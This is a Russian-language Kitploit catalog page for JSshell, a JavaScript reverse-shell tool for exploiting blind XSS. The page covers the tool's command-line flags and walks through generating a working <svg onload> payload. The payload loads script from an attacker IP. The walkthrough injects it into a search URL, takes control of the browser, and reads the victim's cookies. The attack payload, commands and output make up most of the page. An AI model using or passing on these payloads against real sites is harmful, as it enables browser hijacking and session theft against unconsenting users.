Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
JSshell — JSshell - обратная/удалённая оболочка на JavaScript | Kitploit
Инструменты/GitHubGitHub/shelld3v/jsshell
Генерация полезной нагрузкиЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubshelld3v/jsshell

JSshell

JSshell - обратная/удалённая оболочка на JavaScript

Репозиторий
6311103 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

JSshell - версия 3.1

JSshell

JSshell - обратный JavaScript-шелл. Используется для удаленного выполнения JS-кода, эксплуатации слепого XSS, ...

Требования: Любая ОС + Python 2 или Python 3

Новое в JSshell версии 3.1

Обновлено в новой версии JShell 3.1:

  • Новая команда JSshell: snippet -> позволяет написать фрагмент javascript-кода
root@kitploit:~
>>> snippet
Use CTRL+D to finish the snippet

function new() {
    new = 'New update: Support javascript snippet =)';
    confirm(new)
}

new()
>>> 
  • Тихий режим (для профессионалов)
  • Добавлен пэйлоад обратного шелла <body>
  • Исправлены некоторые ошибки

Использование

Сгенерировать пэйлоад обратного JS-шелла: -g

Установить локальный номер порта для прослушивания и генерации пэйлоадов (По умолчанию: 4848): -p

Установить локальный исходный адрес для генерации пэйлоадов (По умолчанию: автоопределение вашего IP-адреса): -s

Установить тайм-аут для соединения с шеллом (если пользователь выйдет из сессии, шелл будет приостановлен навсегда; поэтому, если вы установите тайм-аут, шелл будет закрыт после превышения тайм-аута): -w

Выполнить команду после получения шелла: -c

Примеры использования:

  • jsh.py
  • jsh.py -g
  • jsh.py -p 1234
  • jsh.py -s 48.586.1.23 -g
  • jsh.py -c "alert(document.cookie)" -w 10

Пример запуска JSshell:

Это пошаговый пример использования JSshell.

Сначала нам нужно сгенерировать пэйлоад обратного JS-шелла и установить тайм-аут шелла (например, 20 секунд):

root@kitploit:~
~# whoami
root
~# ls
README.md   jsh.py
~# python3 jsh.py -g -w 20
    __
  |(_  _ |_  _  |  |
\_|__)_> | |(/_ |  |
                      v1.0

Payload:
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>

Listening on [any] 4848 for incoming JS shell ...

Теперь вставьте этот пэйлоад на веб-сайт:

https://vulnwebs1te.com/b/search?q=<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},1248)>

Откройте страницу, и мы получим обратный JS-шелл:

root@kitploit:~
    __
  |(_  _ |_  _  |  |
\_|__)_> | |(/_ |  |
                      v1.0

Payload:
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>

Listening on [any] 4848 for incoming JS shell ...
Got JS shell from [75.433.24.128] port 39154 to DESKTOP-1GSL2O2 4848
$ established
$ the
$ shell
$
$
$ help
JSshell using javascript code as shell commands. Also supports some commands:
help                  This help
exit, quit            Exit the JS shell
$

Выполним несколько команд:

root@kitploit:~
$ var test = 'controlled'
$ confirm(test)
$

И появится всплывающее окно: controlled

root@kitploit:~
$ prompt(document.cookie)
$

И браузер выведет cookies пользователя: JSESSION=3bda8...

root@kitploit:~
$ exit
~# whoami
root
~# pwd
/home/shelld3v
~#

Теперь завершено!

Автор

Создано shelld3v!

Скачать инструмент